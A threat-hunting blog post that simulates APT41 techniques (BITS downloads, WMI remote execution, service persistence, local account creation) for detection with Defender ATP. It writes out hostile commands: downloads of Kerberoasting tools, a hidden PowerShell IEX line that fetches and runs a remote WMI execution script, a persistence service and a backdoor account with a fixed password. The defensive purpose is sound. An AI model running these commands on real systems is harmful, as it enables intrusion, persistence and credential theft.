Today we are going to cover a few techniques that have been used by APT41. During this blog post, we will use the Advanced Hunting feature in Microsoft Defender ATP to hunt for the described techniques.
APT41 is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity.
This threat actor group has been active since 2014, conducted operations backed by the Chinese government, including targeting the health-care and high-tech sectors and conducting espionage against political dissidents.
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
FireEye has covered this pretty well in their blog post, which makes it very easy to simulate it.
Here we can see that APT41 has used the bitsadmin.exe command-line tool to download malicious software.
In order to simulate the same technique, we can run the following command as an example:
bitsadmin /transfer bbbb https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 C:\Temp\ASREPRoast.ps1
After we have simulated this technique, we can start writing a KQL query to hunt for this technique.
The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.
Since it’s also optional to create BITS jobs via PowerShell. It’s recommended to be aware of this variation as well, so here is an example of creating a BITS job via PowerShell.
powershell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -Destination C:\Temp\Invoke-Kerberoast.ps1
After we have executed the above, we can start writing our second KQL query to hunt.
Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components.
According to FireEye – They have notice that APT41 likes to use WMI to execute commands on remote machines.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/OneScripter/WmiExec/master/WmiExec.ps1') .\WmiExec.ps1 -ComputerName RemoteMachine -Command "whoami"
After we have executed the above commands. We can start writing a KQL query to hunt for remote WMI command executions.
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.
In order to extend the advanced hunting capabilities. We can enable the following audit policy to collect logs, when a new service has been installed.
auditpol /set /subcategory:"Security System Extension" /success:enable
Now let’s take a look at the report of FireEye. APT41 created a new service on the compromised machine for persistence.
Let’s do the same, which is creating a new service.
sc create "StorSyncSvc" binPath= "%SystemRoot%\system32\svchost.exe -k "StorSyncSvc" type= share start= auto error= ignore DisplayName= "StorSyncSvc"
In order to query who created a new service on their machine. We can use the following KQL query:
Adversaries may create an account to maintain access to victim systems.
net user localaccount Passw0rd! /add
Here is a KQL query to look for local account creations.
I’ve provided a few KQL queries, but feel free to fine-tune them. I also would like to state that these were just a few examples, that have been used by the threat actors, which doesn’t mean that we have covered all their techniques.